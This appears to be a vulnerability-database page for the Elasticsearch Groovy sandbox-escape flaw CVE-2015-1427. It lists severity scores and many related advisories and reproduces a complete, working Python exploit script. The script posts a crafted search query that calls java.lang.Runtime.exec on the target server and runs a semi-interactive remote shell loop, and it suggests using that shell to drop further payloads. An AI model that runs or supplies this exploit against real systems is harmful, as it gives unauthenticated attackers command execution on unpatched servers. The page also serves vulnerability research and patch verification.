Lucene search
Xiphos Research LtdEDB-ID:36337HistoryMar 11, 2015 - 12:00 a.m.
ElasticSearch - Remote Code Execution
2015-03-1100:00:00
Xiphos Research Ltd
www.exploit-db.com
191
7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
9.6 High
AI Score
Confidence
High
0.856 High
EPSS
Percentile
98.6%
#!/bin/python2
# coding: utf-8
# Author: Darren Martyn, Xiphos Research Ltd.
# Version: 20150309.1
# Licence: WTFPL - wtfpl.net
import json
import requests
import sys
import readline
readline.parse_and_bind('tab: complete')
readline.parse_and_bind('set editing-mode vi')
__version__ = "20150309.1"
def banner():
print """\x1b[1;32m
ββββββ βββ βββ ββββββ βββββββββ βββ ββββββ ββββββ βββ ββ ββββββ βββ βββ
ββ β ββββ ββββββ βββ β β βββ ββββββββββ ββ βββ β ββββ βββββ β ββββ ββββ
ββββ ββββ βββ βββ β ββββ β ββββ βββββββββ β β ββββ ββββββββββββ ββββ ββββ
βββ β ββββ βββββββββ β ββββ ββββ β ββββββββ ββββ β ββββββ βββ βββ β ββββ ββββ
βββββββββββββββββ βββββββββββββ ββββ β βββββ βββββ βββββββββββββββββββββββββββββββββββββββββ
ββ ββ ββ βββ βββ βββββ βββ β β β ββ ββ β ββ β ββ βββ β β β βββββββ ββ ββ βββ ββ βββ β
β β ββ β β β β ββ ββ ββ β β β β β β β β ββ β β β βββ β β β ββ β β ββ β β β
β β β β β β β β β β ββ β β β β ββ β β β β β β
β β β β β β β β β β β β β β β β β β β β
β
Exploit for ElasticSearch , CVE-2015-1427 Version: %s\x1b[0m""" %(__version__)
def execute_command(target, command):
payload = """{"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"}}}""" %(command)
try:
url = "http://%s:9200/_search?pretty" %(target)
r = requests.post(url=url, data=payload)
except Exception, e:
sys.exit("Exception Hit"+str(e))
values = json.loads(r.text)
fuckingjson = values['hits']['hits'][0]['fields']['lupin'][0]
print fuckingjson.strip()
def exploit(target):
print "{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something"
while True:
cmd = raw_input("~$ ")
if cmd == "exit":
sys.exit("{!} Shell exiting!")
else:
execute_command(target=target, command=cmd)
def main(args):
banner()
if len(args) != 2:
sys.exit("Use: %s target" %(args[0]))
exploit(target=args[1])
if __name__ == "__main__":
main(args=sys.argv)Related
kitploit
kitploit
Infection Monkey v1.6 - An Automated Pentest Tool
2018-11-26 20:54:00
Infection Monkey - An Automated Pentest Tool
2018-04-29 12:23:00
securityvulns
securityvulns
Elasticsearch restrictions bypass
2015-02-22 00:00:00
Elasticsearch vulnerability CVE-2015-1427
2015-02-22 00:00:00
openvas
openvas
Elasticsearch Groovy Scripting Engine Unauthenticated Remote Code Execution
2015-03-12 00:00:00
zdt
zdt
ElasticSearch Unauthenticated Remote Code Execution Exploit
2015-03-12 00:00:00
ElasticSearch Search Groovy Sandbox Bypass Exploit
2015-03-12 00:00:00
nuclei
nuclei
ElasticSearch - Remote Code Execution
2021-02-15 18:17:25
prion
prion
Design/Logic Flaw
2015-02-17 15:59:00
cvelist
cvelist
CVE-2015-1427
2015-02-17 15:00:00
cve
cve
CVE-2015-1427
2015-02-17 15:59:04
myhack58
myhack58
cisa_kev
cisa_kev
Elasticsearch Groovy Scripting Engine Remote Code Execution Vulnerability
2022-03-25 00:00:00
osv
osv
Improper Access Control in Elasticsearch
2022-05-14 02:49:44
packetstorm
packetstorm
ElasticSearch Unauthenticated Remote Code Execution
2015-03-12 00:00:00
ElasticSearch Search Groovy Sandbox Bypass
2015-03-12 00:00:00
github
github
Improper Access Control in Elasticsearch
2022-05-14 02:49:44
canvas
canvas
Immunity Canvas: ELASTICSEARCH_CVE_2015_1427
2015-02-17 15:59:00
ubuntucve
ubuntucve
CVE-2015-1427
2015-02-17 00:00:00
checkpoint_advisories
checkpoint_advisories
Elasticsearch Sandbox Escape Command Execution (CVE-2015-1427)
2015-10-19 00:00:00
veracode
veracode
Arbitrary Shell Command Execution In The Groovy Scripting Engine
2015-02-18 17:22:02
nessus
nessus
Elasticsearch Groovy Script RCE
2015-03-13 00:00:00
attackerkb
attackerkb
CVE-2015-1427
2015-02-17 00:00:00
n0where
n0where
Data Center Security Testing Tool: Infection Monkey
2018-03-18 15:03:48
metasploit
metasploit
ElasticSearch Search Groovy Sandbox Bypass
2015-03-10 04:04:32
threatpost
threatpost
Elasticsearch Elastichoney Honeypot Shows 8,000 RCE Attacks
2015-05-11 13:18:29
NFL Players and Agents Targeted in Database Extortion Attempt
2017-10-09 09:00:39
Windows, Linux Devices Hijacked In Two-Year Cryptojacking Campaign
2021-02-17 21:39:10
nvd
nvd
CVE-2015-1427
2015-02-17 15:59:04
freebsd
freebsd
elasticsearch -- remote OS command execution via Groovy scripting engine
2015-02-11 00:00:00
exploitdb
exploitdb
ElasticSearch - Search Groovy Sandbox Bypass (Metasploit)
2015-03-16 00:00:00
nmap
nmap
http-vuln-cve2015-1427 NSE Script
2015-05-21 10:02:56
impervablog
impervablog
talosblog
talosblog
avleonov
avleonov
Vulnerability Management at Tinkoff Fintech School
2019-03-04 10:38:31
redhat
redhat
7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
9.6 High
AI Score
Confidence
High
0.856 High
EPSS
Percentile
98.6%
Related for EDB-ID:36337